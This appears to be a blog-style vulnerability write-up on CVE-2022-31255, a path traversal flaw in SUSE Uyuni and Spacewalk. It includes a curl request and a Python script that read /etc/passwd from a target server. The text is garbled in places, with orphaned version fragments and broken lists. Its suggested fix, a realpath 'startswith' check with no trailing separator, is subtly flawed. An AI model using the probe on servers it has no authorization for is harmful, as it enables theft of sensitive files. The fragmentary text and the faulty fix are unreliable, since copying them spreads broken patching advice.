CVE-2022-31255 - Path Traversal in SUSE Uyuni and Spacewalk — Details, Exploit, and Fixes

CVE-2022-31255 is a path traversal vulnerability found in several SUSE Uyuni and Spacewalk packages, affecting specific versions within SUSE Linux Enterprise Module for SUSE Manager Server 4.2 and 4.3. If exploited, attackers can remotely read files on the server — files that are accessible by the service user (often Tomcat). This means sensitive information which shouldn’t be exposed can be viewed by anyone who crafts a malicious request.

The vulnerability affects core pieces like spacewalk-java, spacewalk-web, and tools like spacecmd, stretching across a suite of packages used by system administrators managing large-scale Linux server deployments.

Why Is Path Traversal Dangerous?

Path traversal (also known as “directory traversal”) allows an attacker to access files that are outside of the intended directory by manipulating file path arguments. For example, using ../../etc/passwd in a URL parameter can let users break out of the web root and read system files.

hub-xmlrpc-api < .7

- ...and more (full affected package list in SUSE’s advisory)

If you’re running an unpatched version of SUSE Manager Server 4.2/4.3 or Uyuni with these modules, you’re at risk.

How Does the Exploit Work? (Technical Details)

Under the hood, this vulnerability occurs because the software fails to validate file path inputs. When an API endpoint or web handler receives a filename (via HTTP parameters, POST data, or XMLRPC), it should _restrict_ access to files inside a certain directory. But due to improper implementation, attackers can slip in ../ directory jumps.

Suppose the web app exposes an endpoint like

GET /download?file=report.txt

But it does *not* properly check if the provided filename stays within /srv/www/appfiles. Now, a hacker can request:

GET /download?file=../../../../etc/passwd

In Python (simplified), the vulnerable code looks like

from flask import request, send_file
import os

@app.route('/download')
def download_file():
    filename = request.args.get('file')           # user input
    file_path = os.path.join('/srv/www/appfiles', filename)
    return send_file(file_path)

If filename is "../../../../etc/shadow", os.path.join doesn’t stop the traversal — the code is tricked into serving any system file readable by Tomcat.

You can test for this vulnerability with any HTTP client. Here’s a curl example

# Attempt to read /etc/passwd from a vulnerable server!
curl "https://target-server/download?file=../../../../etc/passwd";

Or with Python’s requests library

import requests

target = "https://victim-server/download";
payload = "../../../../../etc/passwd"

r = requests.get(target, params={'file': payload})

if "root:x:" in r.text:
    print("Server is vulnerable! /etc/passwd contents:")
    print(r.text)
else:
    print("Not vulnerable, or /etc/passwd not accessible.")

Important: Responsible use only — do not test this on servers you don't own or have authorization to scan.

Real-World Impact

- Sensitive file disclosure: /etc/passwd, application credentials, private configuration files.
- Attack escalation: If the targeted Tomcat process can read more sensitive files, more system details may leak.


## How To Fix / Protect Yourself

spacewalk-web 4.2.30

- Or newer (see official SUSE patch bulletin)

### Workaround / Defense in Depth

Filter input: Only accept whitelisted filename values, never user-controlled file paths.

2. Reject “..” or “/” in filename parameters.

Use realpath & directory checks before serving files

import os

def is_safe_path(basedir, path):
    return os.path.realpath(path).startswith(basedir)

base_path = '/srv/www/appfiles'
file_path = os.path.join(base_path, filename)
if is_safe_path(base_path, file_path):
    send_file(file_path)
else:
    abort(403)

References & More Reading

- SUSE Official Security Announcement
- NVD Entry for CVE-2022-31255
- Uyuni GitHub
- OWASP Path Traversal Cheat Sheet

Summary

CVE-2022-31255 is a classic path traversal bug, but it hit SUSE Manager and Uyuni — core tools for managing Linux infrastructure — making it a high-priority fix for SysAdmins. By abusing poorly checked file requests, attackers can harvest sensitive files using nothing more than a web request.

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/16/2022 18:01:00 UTC